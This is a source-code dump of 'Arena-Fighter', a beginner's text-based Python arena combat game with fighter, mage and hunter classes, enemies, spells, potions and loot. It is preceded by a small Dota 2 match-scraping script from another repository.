"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1414,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 55,
"path": "/test.py",
"repo_name": "ganesshkumar/hollowjack",
"src_encoding": "UTF-8",
"text": "import dota2api\nimport json\nimport time\nimport math\n\nfrom pymongo import MongoClient\n\nclient = MongoClient(\"mongodb://localhost:27017\")\ndb = client[\"hollowjack\"]\napi = dota2api.Initialise()\n\ndef get_league_matches(league_id, loaded_match_ids=[]):\n league_matches_c = db[\"league_matches\"]\n league4664 = api.get_match_history(league_id=league_id)\n\n for match in league4664[\"matches\"]:\n if match[\"match_id\"] in loaded_match_ids:\n continue\n\n league_matches_c.insert_one({\n \"league_id\": league_id,\n \"match_id\": match[\"match_id\"]\n })\n get_match(match[\"match_id\"])\n\ndef get_match(match_id):\n sleep_count = 0\n matches_c = db[\"matches\"]\n while(True):\n try:\n match = api.get_match_details(match_id=match_id)\n match[\"_id\"] = match_id\n matches_c.insert_one(match)\n sleep_count = 0\n break\n except:\n time.sleep(int(math.pow(2, sleep_count)))\n continue\n\n\ndef get_league_match_ids(league_id):\n league_matches_c = db[\"league_matches\"]\n cursor = league_matches_c.find(\n {\"league_id\": league_id},\n {\"league_id\": 0, \"_id\": 0}\n )\n return list(cursor)\n\ndef load_league(league_id):\n loaded_match_ids = get_league_match_ids(league_id)\n get_league_matches(league_id, loaded_match_ids)\n\n\nif __name__ == \"__main__\" :\n load_league(4664)\n"
},
{
"alpha_fraction": 0.4583333432674408,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "797ecf8b538c047344a419d420c12a5303f247c0",
"content_id": "00fa980082a2c14de3f3e43af46bdc786c9a222c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "ganesshkumar/hollowjack",
"src_encoding": "UTF-8",
"text": "dota2api==1.3.1\npymongo==3.2.2\nrequests==2.10.0\n"
}
] | 2 |
vcable/Arena-Fighter
|
https://github.com/vcable/Arena-Fighter
|
46329b712feafe9391069282acc73d86e8f3058c
|
2ec8c7e00a188eb395fc6273da24fb3c01286763
|
c8dc4c16f690bd09e7009014e9a4a6064633074c
|
refs/heads/master
| 2020-08-21T21:35:46.310837 | 2019-10-25T02:00:01 | 2019-10-25T02:00:01 | 216,251,369 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6043570041656494,
"alphanum_fraction": 0.6177090406417847,
"avg_line_length": 31.976743698120117,
"blob_id": "ab05d6c720acfb29de3a40bc15b48f722c684f3e",
"content_id": "d01316ea6d5eedf8794d9f28986a382b414dbb21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4269,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 129,
"path": "/enemies.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines all the enemies that can be encountered in the arena\n# ALL ENEMY METHOD DOCUMENTATION IS IN THE WEAKSWORDSMAN CLASS \n# SINCE ALL THE METHODS ARE THE SAME\n\nimport time\nimport weapons\nimport class_methods\nimport inventory\nfrom termcolor import colored, cprint\n\n\nclass WeakSwordsman:\n\n # Sets name, and basic stats\n def __init__(self, name):\n self.entity_class = colored(\"weak swordsman\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 30\n self.current_health = 30\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.RustyShortsword\n self.strength = 3\n self.dexterity = 1\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! He is armed with a {self.weapon.weapon_type}\")\n\n # Attack function is imported from the class_methods module\n attack = class_methods.attack\n\n # take_damage function is imported from the class_methods module\n take_damage = class_methods.take_damage\n \n # Allows AI to consume a potion. They do this automatically if their health is below 20.\n # (the below 20 rule is coded out in main.py in the enemy_turn() method)\n consume_potion = class_methods.enemy_consume_potion\n \nclass Bear:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"bear\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 50\n self.current_health = 50\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Claws\n self.strength = 10\n self.dexterity = 2\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! It's claws look terribly sharp...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass SeasonedGladiator:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"seasoned gladiator\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 60\n self.current_health = 60\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Morningstar\n self.strength = 12\n self.dexterity = 5\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! He swings his morningstar menacingly...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass Basilisk:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"basilisk\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 60\n self.current_health = 60\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Fangs\n self.strength = 8\n self.dexterity = 10\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! His fangs drip with poison...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n \nclass SmallDragon:\n \n def __init__(self, name):\n time.sleep(2)\n self.entity_class = colored(\"small dragon\", \"red\")\n self.name = colored(name, \"red\")\n self.max_health = 70\n self.current_health = 70\n self.damage_done = 0\n self.alive = True\n self.weapon = weapons.Firebreath\n self.strength = 12\n self.dexterity = 4\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 2, 0)\n \n print(f\"\\nA {self.entity_class} named {self.name} appears! His eyes glow like embers...\")\n \n attack = class_methods.attack\n \n take_damage = class_methods.take_damage\n \n consume_potion = class_methods.enemy_consume_potion\n\n \n\n "
},
{
"alpha_fraction": 0.5306987762451172,
"alphanum_fraction": 0.5367154479026794,
"avg_line_length": 43.327274322509766,
"blob_id": "89b271f578009ddf2a084e4940393cefc7b3c3ca",
"content_id": "cd838cd9596a29e34156b58d1481b817d07f216f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7313,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 165,
"path": "/class_methods.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "import potions_and_items\nimport time\nimport inventory\nfrom termcolor import colored, cprint\nimport weapons\nimport random\nimport spells\n\n# This module defines common class methods, such as attack and deal damage\n\n# Attacks a given target. Damage is dependent on weapon used\ndef attack(self, target):\n if self.alive == False:\n pass\n else:\n print(f\"\\n{self.name} attacks {target}!\")\n time.sleep(2)\n self.damage_done = self.weapon.damage\n print(f\"\\n{self.name} does {self.damage_done} damage with his {self.weapon.weapon_type}\")\n\n# Takes damage (subtracts taken damage from max_health) and check for death\ndef take_damage(self, damage):\n self.current_health -= damage \n print(f\"\\n{self.name} took {damage} damage! Total health is now {self.current_health}/{self.max_health}\")\n if self.current_health <= 0:\n print(f\"\\n{self.name} is dead.\")\n self.alive = False\n \n \n# Player death message and program exit\ndef player_death(self):\n if self.alive == False:\n print(\"You have fought valiantly in the arena, but unfortunately you have suffered defeat.\")\n exit()\n \n# Allows user to consume a potion\ndef player_consume_potion(self):\n print(f\"\\nWhich potion would you like to use? Look at your inventory, and select one! (enter 'health potion'/'mana potion')\")\n self.inventory.print_inventory()\n p_input = input(\"\\n> \")\n \n if p_input == \"health potion\" and self.inventory.health_potion > 0 and self.current_health < self.max_health:\n self.current_health += 10\n self.inventory.health_potion -= 1\n print(f\"\\n{self.name} uses a health potion.\")\n time.sleep(2)\n print(f\"\\n{self.name}'s current health is now {self.current_health}/{self.max_health}\")\n \n elif p_input == \"mana potion\" and self.inventory.mana_potion > 0 and self.current_mana < self.max_mana:\n print(f\"\\n{self.name} uses a mana potion.\")\n self.current_mana += 10\n self.inventory.mana_potion -= 1\n time.sleep(2)\n print(f\"\\n{self.name}'s current mana is now {self.current_mana}/{self.max_mana}\")\n \n else:\n time.sleep(2)\n print(\"\\nEither you can't use that particular potion, your health/mana points are full, or you entered some invalid input. Try again!\")\n self.consume_potion()\n \n# Consume potion method for AI. I made 2 different methods because the AI has to decide independently when to use a potion\n# and what potion to use, whereas the player decides differently\n# Note: Enemies currently do not have mana, so they will only be able to consume health potions\ndef enemy_consume_potion(self):\n if self.current_health < self.max_health / 2 and self.inventory.health_potion > 0:\n time.sleep(2)\n self.current_health += 10\n self.inventory.health_potion -= 1\n print(f\"\\n{self.name} uses a health potion and recovers 10 health points. Current health is {self.current_health}/{self.max_health}\")\n else:\n pass\n \n# Resets players stats (health/mana) before every encounter and grants potions\ndef reset_stats(self):\n hp = colored(\"2\", \"yellow\")\n mp = colored(\"1\", \"yellow\")\n try:\n self.current_mana = self.max_mana\n time.sleep(2)\n print(f\"\\n{self.name}'s mana points have been reset. They are now at {self.current_mana}/{self.max_mana}\")\n except:\n pass\n \n self.current_health = self.max_health\n time.sleep(2)\n print(f\"\\n{self.name}'s health points have been reset. They are now at {self.current_health}/{self.max_health}\")\n \n if self.class_name == \"Fighter\" or self.class_name == \"Hunter\":\n self.inventory.health_potion += 2\n time.sleep(2)\n print(\"\\nYou have been granted \" + hp + \" health potions.\")\n elif self.class_name == \"Mage\":\n self.inventory.mana_potion += 1\n self.inventory.health_potion += 2\n time.sleep(2)\n print(\"\\nYou have been granted \" + mp + \" mana potion and \" + hp + \" health potions.\") \n \n# This function handles the loot system\ndef loot(self):\n \n if self.class_name == \"Fighter\":\n # Items that can drop\n items = [potions_and_items.HealthPotion.name, \n weapons.Longsword.weapon_type, \n weapons.RustyShortsword.weapon_type, \n weapons.Morningstar.weapon_type]\n\n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n else:\n self.inventory.weapons.append(loot)\n time.sleep(2)\n print(\"\\nYou loot a \" + loot)\n \n elif self.class_name == \"Mage\":\n \n items = [potions_and_items.HealthPotion.name,\n potions_and_items.ManaPotion.name,\n spells.LightningBolt.spell_name,\n spells.Stun.spell_name]\n \n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n elif loot == potions_and_items.ManaPotion.name:\n self.inventory.mana_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a mana potion.\")\n else:\n self.spell_list.append(colored(loot, \"yellow\"))\n self.mana_costs.append(\"(10 mana)\")\n time.sleep(2)\n print(\"\\nYou loot a \" + loot + \" scroll.\")\n \n elif self.class_name == \"Hunter\":\n \n items = [potions_and_items.HealthPotion.name,\n weapons.Crossbow.weapon_type,\n potions_and_items.HealthPotion.name,\n weapons.Slingshot.weapon_type]\n \n loot = random.choice(items)\n \n if loot == potions_and_items.HealthPotion.name:\n self.inventory.health_potion += 1\n time.sleep(2)\n print(\"\\nYou loot a health potion.\")\n else:\n self.inventory.weapons.append(loot)\n time.sleep(2)\n print(\"\\nYou loot a \" + loot) \n\n# Equips weapons from inventory\n#def equip(self):\n #print(\"Enter the name of the weapon you would like to equip.\")\n #p_input = input(\"> \")\n #if p_input in self.weapons:\n #self.weapon = p_"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5668604373931885,
"avg_line_length": 32.37313461303711,
"blob_id": "d5c24c99b4ba5c125171901657701d50070088f0",
"content_id": "7609041b21f43510a9aa30a4a3db2b6ebefbc09a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8944,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 268,
"path": "/main.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Sets up battles in the arena\n\nimport classes\nimport enemies\nfrom termcolor import colored, cprint\nimport time\nfrom os import system, name\n\n# Clears screen before game start\ndef clear():\n \n # for windows\n if name == 'nt':\n _ = system('cls')\n \n # for mac and linux\n else:\n _ = system('clear')\n\n# Keeps track of player character\n# This class has a dynamically created variable called player_character that is\n# created when the player goes through the character creation process.\n# This variable ties directly to the picked class\n\n\nclass PlayerCharacter:\n\n def __init__(self):\n return\n\n\n# Keeps track of current enemy\n# This class contains a dynamically created variable that is \n# changed depending on the encounter. It is tied directly to\n# the enemy class \nclass CurrentEnemy:\n \n def __init__(self):\n return\n\n# Takes care of combat loop\nclass Combat:\n \n # Combat loop w/ turns\n def combat_loop(self):\n while CurrentEnemy.current_enemy.alive == True:\n self.enemy_turn()\n self.player_turn()\n \n # Player turn\n def player_turn(self):\n \n if PlayerCharacter.player_character.class_name == \"Mage\":\n print(\"\\nYou can attack, use a potion, view your spells, or view your inventory. Enter 'attack', 'potion', 'spells', or 'inventory'.\")\n player_input = input(\"> \")\n else:\n print(\"\\nYou can attack, use a potion, or view your inventory. Enter 'attack', 'potion', or 'inventory'.\")\n player_input = input(\"> \")\n \n if player_input.lower().strip(\"\\n\") == \"attack\":\n PlayerCharacter.player_character.attack(CurrentEnemy.current_enemy.name)\n time.sleep(2)\n CurrentEnemy.current_enemy.take_damage(PlayerCharacter.player_character.damage_done)\n time.sleep(2)\n \n elif player_input.lower().strip(\"\\n\") == \"potion\":\n time.sleep(2)\n PlayerCharacter.player_character.consume_potion()\n \n elif player_input.lower().strip(\"\\n\") == \"inventory\":\n PlayerCharacter.player_character.inventory.print_inventory()\n self.player_turn()\n \n elif player_input.lower().strip(\"\\n\") == \"spells\" and PlayerCharacter.player_character.class_name == \"Mage\":\n PlayerCharacter.player_character.list_spells()\n self.player_turn()\n \n else:\n time.sleep(2)\n print(\"\\nInvalid input, please try again.\")\n self.player_turn()\n \n \n \n # Enemy turn\n def enemy_turn(self):\n print(f\"\\nIt is {CurrentEnemy.current_enemy.name}'s turn.\")\n CurrentEnemy.current_enemy.consume_potion()\n time.sleep(2) \n CurrentEnemy.current_enemy.attack(PlayerCharacter.player_character.name)\n time.sleep(2)\n PlayerCharacter.player_character.take_damage(CurrentEnemy.current_enemy.damage_done)\n time.sleep(2)\n \n # Check death condition\n PlayerCharacter.player_character.player_death()\n \n\n# Initializes encounters with different enemies\nclass Encounters:\n \n # Handles the Weak Swordsman encounter\n def w_sword_encounter(self):\n CurrentEnemy.current_enemy = enemies.WeakSwordsman(\"Glorb\")\n time.sleep(2)\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the Weak Swordsman {CurrentEnemy.current_enemy.name}! You have tasted victory, but don't expect the rest of the fights to be this easy...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n # Bear encounter \n def bear_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.Bear(\"Rusty\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the bear {CurrentEnemy.current_enemy.name}, yet there are many battles that lie ahead...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def seasoned_g_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.SeasonedGladiator(\"Olaf\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the seasoned gladiator {CurrentEnemy.current_enemy.name}, but there are still many battles on the horizon...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def basilisk_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.Basilisk(\"Ronny\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the hissing basilisk Ronny, but there are more encounters ahead...\")\n time.sleep(2)\n PlayerCharacter.player_character.loot()\n \n def dragon_encounter(self):\n time.sleep(2)\n CurrentEnemy.current_enemy = enemies.SmallDragon(\"Drogon\")\n combat = Combat()\n combat.combat_loop()\n print(f\"\\nYou have defeated the small dragon Drogon, and quelled the fire in his lungs.\")\n time.sleep(2)\n cprint(\"\\nYou are the champion of the arena!\", \"red\")\n exit(0)\n \n\nclass Game:\n\n def __init__(self):\n\n # clear screen\n clear()\n \n # Introductory message\n \n cprint( \n \"\"\"\n _________________________________________\n \n WELCOME TO\n \n ARENA FIGHTER\n _________________________________________\"\"\", \"red\")\n \n # Create player character\n time.sleep(2)\n self.create_pc()\n \n # Start first encounter\n self.encounter_1()\n \n # Second encounter, etc\n self.encounter_2()\n \n self.encounter_3()\n \n self.encounter_4()\n \n self.encounter_5()\n\n # Handles creation of player character\n def create_pc(self):\n\n print(\"\\nPlease select your class: Fighter, Mage, or Hunter\")\n\n class_selection = input(\"> \")\n\n if class_selection.lower().strip(\"\\n\") == \"fighter\":\n\n print(\"Pick a name for your fighter!\")\n fighter_name = input(\"> \")\n PlayerCharacter.player_character = classes.Fighter(fighter_name)\n time.sleep(2)\n\n elif class_selection.lower().strip(\"\\n\") == \"mage\":\n\n print(\"Pick a name for your mage!\")\n mage_name = input(\"> \")\n PlayerCharacter.player_character = classes.Mage(mage_name)\n time.sleep(2)\n\n elif class_selection.lower().strip(\"\\n\") == \"hunter\":\n\n print(\"Pick a name for your hunter!\")\n hunter_name = input(\"> \")\n PlayerCharacter.player_character = classes.Hunter(hunter_name)\n time.sleep(2)\n \n else:\n \n print(\"That is not a valid class, please try again.\")\n time.sleep(2)\n self.create_pc()\n \n def encounter_1(self):\n \n # Makes encounters available\n arena = Encounters()\n \n # Starts first encounter\n cprint(\"\\nWelcome to the arena, warrior!\", \"red\")\n time.sleep(2.5)\n arena.w_sword_encounter()\n \n def encounter_2(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n # Same exact functionality as encounter_1\n arena = Encounters()\n print(\"\\nHaving dealt with the Weak Swordsman, you wipe his blood from your blade.\")\n time.sleep(2)\n print(\"In the distance, you hear the ferocious growl of a bear...\")\n arena.bear_encounter()\n \n def encounter_3(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe bear heaves it's last breath, rolled over on its side.\")\n time.sleep(2)\n print(\"With barely a moment to breathe, you see your next opponent approaching...\")\n arena.seasoned_g_encounter()\n \n def encounter_4(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe gladiator is gone, but you hear the hiss of a basilisk...\")\n arena.basilisk_encounter()\n \n def encounter_5(self):\n \n PlayerCharacter.player_character.reset_stats()\n \n arena = Encounters()\n print(\"\\nThe basilisk lies at your feet, cut in half.\")\n time.sleep(2)\n print(\"You feel the warmth of fire on the back of your neck, and look around to see an angry-looking dragon...\")\n arena.dragon_encounter()\n \narena_fighter = Game()\n"
},
{
"alpha_fraction": 0.5647059082984924,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 18.225807189941406,
"blob_id": "d981ea81471ca5e9e2dc97a6e105bee2bc7927f1",
"content_id": "64ab30c7fe6ea3eddba3210483bde00b84079b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 595,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 31,
"path": "/spells.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# Defines all the available spells in the game. These are used both by the player character and NPCs\n\nclass Fireball:\n \n spell_name = \"Fireball\"\n mana_required = 2\n damage = 10\n \nclass FrozenArrow:\n \n spell_name = \"Frozen Arrow\"\n mana_required = 2\n damage = 10\n \nclass MeteorShower:\n \n spell_name = \"Meteor Shower\"\n mana_required = 5\n damage = 20\n \nclass LightningBolt:\n \n spell_name = \"Lightning Bolt\"\n mana_required = 2\n damage = 10\n \nclass Stun:\n \n spell_name = \"Stun\"\n mana_required = 5\n damage = 0"
},
{
"alpha_fraction": 0.7628742456436157,
"alphanum_fraction": 0.7640718817710876,
"avg_line_length": 43,
"blob_id": "a1fe69f4053196351a3a64fbdb9a7b7cbf5da95f",
"content_id": "c04b1567dcff687d841255511135d9925925fa9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 19,
"path": "/README.md",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "**What is Arena Fighter?**\n\nArena fighter is a simple text-based game where the player is pitted against various enemies.\nThe player can choose between three classes: Fighter, Hunter, and Mage. \nAs of right now, the game is in very early stages, but as time goes on I plan on adding more complex features like\nXP, more advanced AI, more encounters, more classes, and more abilities/spells/items/weapons.\n\n**How to Run the Game**\n\nIf you're interested in checking out Arena Fighter, simply clone the repository, install the dependencies listed below, and run *main.py* with Python 3. \nDISCLAIMER: THE GAME IS NOT FINISHED AT ALL\n\n**Dependencies**\n\nAt the moment, there is only one required library, <a href=\"https://pypi.org/project/termcolor/\">termcolor</a>.\n\n**Changelog**\n\nView a record of all the updates in the CHANGELOG.md file."
},
{
"alpha_fraction": 0.5776119232177734,
"alphanum_fraction": 0.5776119232177734,
"avg_line_length": 39.06060791015625,
"blob_id": "380141b33ce5c5c0fea73b9217395e0bbbe7cf89",
"content_id": "8ecf4c8f7641b38a215c8ce53cc26441f8ea5e07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 33,
"path": "/inventory.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# The inventory allows both players and enemies to store items, and access them\n\nfrom termcolor import colored, cprint\nimport class_methods\n\n# When creating the class, specify the weapon (enemy or player's default weapon at the moment) \n# and number of health/mana potions\nclass Inventory:\n \n def __init__(self, weapon, hp_num, mp_num):\n self.weapon = weapon\n self.health_potion = hp_num\n self.mana_potion = mp_num\n \n # Weapons picked up through loot system go in this array\n self.weapons = []\n \n # Prints out inventory \n def print_inventory(self):\n \n cprint(\"_____________\", \"yellow\")\n cprint(\"\\nINVENTORY\", \"yellow\")\n weapon = colored(f\"{self.weapon}\", \"yellow\")\n print(f\"\\nEquipped weapon: \" + weapon)\n print(f\"\\nOther weapons: \" + (\", \").join(self.weapons))\n hp_amount = colored(str(self.health_potion) + \" health potion(s)\", \"yellow\")\n mp_amount = colored(str(self.mana_potion) + \" mana potion(s)\", \"yellow\")\n print(\"\\nYou have \" + hp_amount + \" and \" + mp_amount)\n #print(\"\\nTo equip a different weapon, enter 'equip.'\")\n #p_input = input(\"> \")\n #if p_input.lower().strip(\"\\n\") == \"equip\":\n #class_methods.equip(self)\n cprint(\"_____________\", \"yellow\")\n\n \n "
},
{
"alpha_fraction": 0.5759946703910828,
"alphanum_fraction": 0.5820955038070679,
"avg_line_length": 34.56132125854492,
"blob_id": "6f6e398a60860bb686ad7146c34bb3ef55976cba",
"content_id": "6a290ff84f2d7218486b28cc3e6f455afe77a4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7540,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 212,
"path": "/classes.py",
"repo_name": "vcable/Arena-Fighter",
"src_encoding": "UTF-8",
"text": "# This file will define the available classes in Arena Fighter\n# At the moment, there are three classes: Fighter, Mage, and Hunter\n\n# The fighter uses swords, spears, and clubs, and fights in close quarters\n# The mage uses spells, and engages from afar\n# The hunter uses ranged weapons such as longbows, crossbows, and slingshots\n\n# Each class has default weapons/spells, and starts with 3 health potions\n\nimport weapons\nimport class_methods\nimport spells\nimport inventory\nfrom termcolor import colored, cprint\n\n\nclass Fighter:\n\n # Init function to set a user-defined name and default stats\n def __init__(self, name):\n self.name = colored(name, \"blue\")\n self.class_name = \"Fighter\"\n self.weapon = weapons.Shortsword\n self.max_health = 100\n self.current_health = 100\n self.alive = True\n self.strength = 10\n self.dexterity = 5\n self.damage_done = 0\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n print(f\"\\nYour fighter's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n\n # Attacks a target and does damage based on weapon\n attack = class_methods.attack\n\n # Subtracts taken damage from current health\n take_damage = class_methods.take_damage\n\n # Checks for death\n player_death = class_methods.player_death\n \n # Resets health\n reset_stats = class_methods.reset_stats\n\n # Uses health potion\n consume_potion = class_methods.player_consume_potion\n \n # Runs loot generator\n loot = class_methods.loot\n \n # Equips different weapon\n #equip = class_methods.equip\n\nclass Mage:\n \n # Sets user-defined name and default stats\n def __init__(self, name):\n self.name = name\n self.weapon = weapons.WoodenStaff\n self.max_health = 80\n self.damage_done = 0\n self.current_health = 80\n self.alive = True\n self.class_name = \"Mage\"\n self.strength = 5\n self.dexterity = 6\n self.max_mana = 30\n self.current_mana = 30\n self.fireball = spells.Fireball\n self.frozen_arrow = spells.FrozenArrow\n self.meteor_shower = spells.MeteorShower\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 2)\n \n self.spell_list = [colored(\"\\nMeteor Shower\", \"yellow\"), \n colored(\"Fireball\", \"yellow\"), \n colored(\"Frozen Arrow\", \"yellow\")]\n self.mana_costs = [\"(15 mana)\",\n \"(10 mana)\",\n \"(10 mana)\",]\n \n print(f\"Your mage's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n \n # Subtract taken damage from current_health\n take_damage = class_methods.take_damage\n \n # Checks if current_health <= 0\n player_death = class_methods.player_death\n \n # Resets health and mana\n reset_stats = class_methods.reset_stats\n \n # Uses health/mana potion\n consume_potion = class_methods.player_consume_potion\n \n loot = class_methods.loot\n \n #equip = class_methods.equip\n \n # Keeps track of mage's spells and lists them\n def list_spells(self):\n \n cprint(\"\\nSPELLS\", \"yellow\")\n \n # I realize this method for concatenating elements from two\n # different arrays is dumb but I'm still new to Python\n j = 0\n for i in self.spell_list:\n print(i + \" \" + self.mana_costs[j]) \n j += 1\n \n \n # Allows mages to pick from available spells\n def pick_spell(self):\n self.list_spells()\n print(\"\\nEnter a spell to equip it. Enter 'back' to go back to turn menu.\")\n spell_selection = input(\"> \")\n \n if spell_selection.lower().strip(\"\\n\") == \"fireball\":\n print(\"\\nYou have selected the Fireball spell. Are you sure? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.Fireball\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n elif spell_selection.lower().strip(\"\\n\") == \"frozen arrow\":\n print(\"\\nYou have selected the Frozen Arrow spell. Are you sure? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.FrozenArrow\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n elif spell_selection.lower().strip(\"\\n\") == \"meteor shower\":\n print(\"\\nYou have selected the Meteor Shower spell. Are you sure? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n self.equiped_spell = spells.MeteorShower\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick another spell!\")\n self.pick_spell()\n \n else:\n print(\"\\nThat is not a valid spell, please try again. If you would like to choose a different action, enter 'action'. Otherwise, press the enter key.\")\n self.pick_spell()\n \n \n # Casts the currently equipped spell \n def cast_equipped_spell(self, target):\n if self.current_mana < self.equiped_spell.mana_required:\n print(\"\\nNot enough mana. Select a different spell or drink a mana potion.\")\n self.pick_spell()\n else:\n print(f\"\\n{self.name} casts {self.equiped_spell.spell_name} on {target}.\")\n self.damage_done = self.equiped_spell.damage\n self.current_mana -= self.equiped_spell.mana_required\n print(f\"\\n{self.name} does {self.damage_done} damage with {self.equiped_spell.spell_name}.\")\n \n # Allows mages to attack\n def attack(self, target):\n self.pick_spell()\n print(\"\\nCast currently equipped spell? (yes/no)\")\n p_input = input(\"> \")\n if p_input.lower().strip(\"\\n\") == \"yes\":\n target = target\n self.cast_equipped_spell(target)\n elif p_input.lower().strip(\"\\n\") == \"no\":\n print(\"\\nPick a different spell.\")\n self.pick_spell()\n \n \n\nclass Hunter:\n \n # Init function to set a user-defined name and default stats\n def __init__(self, name):\n self.name = name \n self.weapon = weapons.Longbow\n self.damage_done = 0\n self.class_name = \"Hunter\"\n self.max_health = 75\n self.current_health = 75\n self.alive = True\n self.strength = 5\n self.dexterity = 10\n self.inventory = inventory.Inventory(f\"{self.weapon.weapon_type}\", 1, 0)\n \n self.weapons = []\n \n print(f\"Your hunter's name is {self.name} and he is armed with a {self.weapon.weapon_type}.\")\n \n # Attack method works the same way as the fighter\n attack = class_methods.attack\n \n # Take damage method works the same way as the fighter\n take_damage = class_methods.take_damage\n \n # Check if current_health <= 0\n player_death = class_methods.player_death\n \n # Resets health \n reset_stats = class_methods.reset_stats\n \n # Uses health potion\n consume_potion = class_methods.player_consume_potion\n \n loot = class_methods.loot\n \n #equip = class_methods.equip\n\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 17.16666603088379,
"blob_id": "7f7de5230a5e99014e2012d7f474bc85b4b0961e",
"content_id": "f82c8694dd9aa5de144a4e62e312d79e244fab19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
